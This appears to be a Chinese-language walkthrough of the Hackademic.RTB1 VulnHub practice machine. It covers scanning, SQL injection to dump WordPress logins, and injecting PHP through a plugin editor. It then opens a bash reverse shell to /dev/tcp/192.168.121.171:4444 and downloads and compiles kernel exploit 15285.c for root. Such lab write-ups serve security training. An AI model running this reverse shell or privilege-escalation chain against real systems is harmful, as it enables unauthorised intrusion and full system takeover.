当前位置: 首页 > news >正文

Hackademic.RTB1靶场实战【超详细】

靶机下载链接:https://download.vulnhub.com/hackademic/Hackademic.RTB1.zip

一、主机探测和端口扫描

nmap 192.168.121.0/24

ip:192.168.121.196

端口:22、80

二、访问80端口

发现target可点击

点击后跳转,页面提示目标是读取到 key.txt 文件

findsomething插件 查看网站的js接口

拼接 /Hackademic_RTB1/?feed=rss 看到 wordpress 版本

三、目录扫描

dirb http://192.168.121.196/

前面发现为 wordpress,kali 使用 wpscan 扫描网站

wpscan --url  http://192.168.121.196

其中发现了一个路径 http://192.168.23.143/Hackademic_RTB1/wp-content/themes/starburst/style.css

可以看到 wp-content 位置,尝试将其修改为 wordpress的默认路径wp-admin,发现后台登录页面

使用 wpscan 扫描用户

使用 cewl 爬取网站密码文本

cewl 192.168.121.196 -w pass.txt

密码未能成功爆破

我们回到findsomething中,发现url中携带参数

可以进行sql注入

首先测cat参数,发现存在sql注入

dump 下数据,获取账号密码

挨个登录,登录GeorgeMiller发现插件里面能直接修改php代码,我们添加phpinfo,发现成功解析

四、get shell

exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.121.171/4444 0>&1'");

kali开启监听,访问hello.php文件,成功反弹shell

五、提权

使用 python 启用交互式shell

sudo -l

查看当前权限,发现需要密码

查看内核版本

uname -a

搜一下相关版本的提权漏洞

searchsploit linux kernel 2.6.3

排除一些其他 linux 操作系统,精确版本,尝试后发现 15285.c 可利用

searchsploit -m 15285

开启一个临时 web 服务,靶机将其下载到 tmp 目录下

python3 -m http.serverwget http://192.168.121.171:8000/15285.c

进行编译后,执行文件,提权成功

gcc 15285.c -o 15285
./15285

http://www.lryc.cn/news/424887.html

相关文章:

  • 让3岁小孩都能理解LeetCode每日一题_3148.矩阵中的最大得分
  • 8.15日学习打卡---Spring Cloud Alibaba(三)
  • 2024下半年EI学术会议一览表
  • 【海奇HC-RTOS平台E100-问题点】
  • 性能测试之Mysql数据库调优
  • 使用 RestHighLevelClient 进行 Elasticsearch 高亮查询及解析
  • Java基础入门15:算法、正则表达式、异常
  • SpringBoot响应式编程 WebFlux入门教程
  • LeetCode 383. 赎金信
  • python绘制电路图
  • Vue3 Suspense 和 defineAsyncComponent 结合使用方法
  • GitHub中Codespace怎么使用;LLM模拟初始化;MLP:全连接神经网络的并行执行
  • 【rh】rh项目部署
  • VoxelNet: End-to-End Learning for Point Cloud Based 3D Object Detection
  • 结构开发笔记(三):solidworks软件(二):小试牛刀,绘制一个立方体
  • LLM 量化算法AutoRound 0.3 发布及原理浅析
  • 汽车免拆诊断案例 | 2013款北京现代悦动车发动机偶尔无法起动
  • React、AntD,封装动态表单
  • 【Linux基础】Linux中的开发工具(3)--make/makefile和git的使用
  • 过滤了字母、数字、_、$的webshell命令执行技巧
  • python-A+B again
  • C语言—函数递归
  • 结构开发笔记(四):solidworks软件(三):绘制36x36方块摄像头示意体
  • 【机器学习】Caltech-101的基本概念和使用方法以及Caltech-101和ImageNet的联系和区别
  • mysql Ubuntu安装与远程连接配置
  • c语言中比较特殊的输入格式
  • 远程命令行控制SSH
  • 钢铁百科:A572Gr60和SA572Gr60材质分析、A572Gr60和SA572Gr60简介
  • 一次sql请求,返回分页数据和总条数
  • 2.5 pyautogui 实现微信自动回复